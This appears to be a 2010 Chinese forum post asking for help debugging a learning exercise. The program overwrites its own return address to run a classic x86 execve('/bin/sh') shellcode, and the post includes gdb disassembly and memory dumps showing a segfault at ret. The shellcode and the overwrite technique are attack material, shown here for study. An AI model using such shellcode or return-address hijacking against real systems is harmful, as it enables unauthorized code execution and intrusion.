- 论坛徽章:
- 0
|
- char shellcode[] =
- "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
- "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
- "\x80\xe8\xdc\xff\xff\xff/bin/sh";
- void main() {
- int *ret;
- ret = (int *)&ret + 2;
- (*ret) = (int)shellcode;
- }
Dump of assembler code for function main:
0x08048250 <+0>: push %ebp
0x08048251 <+1>: mov %esp,%ebp
0x08048253 <+3>: sub $0x10,%esp
0x08048256 <+6>: lea -0x4(%ebp),%eax
0x08048259 <+9>: add $0x8,%eax
0x0804825c <+12>: mov %eax,-0x4(%ebp)
0x0804825f <+15>: mov -0x4(%ebp),%eax
0x08048262 <+18>: mov $0x80c6020,%edx
0x08048267 <+23>: mov %edx,(%eax)
0x08048269 <+25>: leave
=> 0x0804826a <+26>: ret
ret时候报Program received signal SIGSEGV, Segmentation fault.
程序的目的是做 buffer overflow attack的,执行到0x0804826a前,各参数都是正确的
估计是 ret 指令 ip被赋值为 shellcode地址时 错误
但我实在不知道 这违反啥编程条例
把我做的调试信息都填出来吧
请指教
(gdb) info registers ebp
ebp 0xbffff438 0xbffff438
(gdb) x /32wx 0xbffff438
0xbffff438: 0xbffff4a8 0x080c6020 0x00000001 0xbffff4d4
0xbffff448: 0xbffff4dc 0x00000000 0x00000000 0x00000000
0xbffff458: 0x00000000 0x00000000 0x00000000 0x080488b0
ebp后面的ret地址为 0x080c6020
(gdb) x /32wx 0x080c6020
0x80c6020 <shellcode>: 0x895e1feb 0xc0310876 0x89074688 0x0bb00c46
对应的地址也是我预先定位的 shell code 的地址
奇怪的是一执行到ret 就 段错误了 |
|
免费注册
发表于 2010-06-20 15:52
